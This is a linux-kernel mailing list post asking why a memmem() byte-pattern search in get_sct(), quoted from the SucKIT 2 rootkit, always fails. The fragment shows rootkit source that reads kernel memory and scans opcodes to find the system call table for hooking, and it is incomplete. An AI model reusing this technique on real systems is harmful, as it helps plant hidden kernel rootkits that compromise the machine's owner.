this code from get_sct() of suckit 2, why memmem()
"\xc7\x44\x24\x18\xda\xff\xff\xff\xe8"use, what it want to find?
The get_sct() founction:
ulong get_sct()
{
uchar code[SCLEN+256];
uchar *p, *pt;
ulong r;
uchar pt_off, pt_bit;
int i;
kernel_old80 = get_ep();
if (!kernel_old80)
return 0;
if (rkm(code, sizeof(code), kernel_old80-4) <= 0)
return 0;
if (!memcmp(code, "PUNK", 4))
return 0;
p = (char *) memmem(code, SCLEN, "\xff\x14\x85", 3);
if (!p) return 0;
pt = (char *) memmem(p+7, SCLEN-(p-code)-7,
"\xc7\x44\x24\x18\xda\xff\xff\xff\xe8", 9);
/* when run at here , it always return 0 */
if (!pt) {
eprintf("pt = %s\n", pt);
return 0;
}
sc.trace = *((ulong *) (pt + 9));
sc.trace += kernel_old80 + (pt - code) - 4 + 9 + 4;
pt = (char *) memmem(p+7, SCLEN-(p-code)-7, "\xff\x14\x85", 3);
if (!pt) return 0;
for (i = 0; i < (p-code); i++) {
if ((code[i] == 0xf6) && (code[i+1] == 0x43) &&
(code[i+4] == 0x75) && (code[i+2] < 127)) {
pt_off = code[i+2];
pt_bit = code[i+3];
goto cc;
}
}
return 0;
}
-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to [email protected]
More majordomo info at http://vger.kernel.org/majordomo-info.html
Please read the FAQ at http://www.tux.org/lkml/
[Index of Archives]
[Kernel Newbies]
[Netfilter]
[Bugtraq]
[Photo]
[Stuff]
[Gimp]
[Yosemite News]
[MIPS Linux]
[ARM Linux]
[Linux Security]
[Linux RAID]
[Video 4 Linux]
[Linux for the blind]
[Linux Resources]
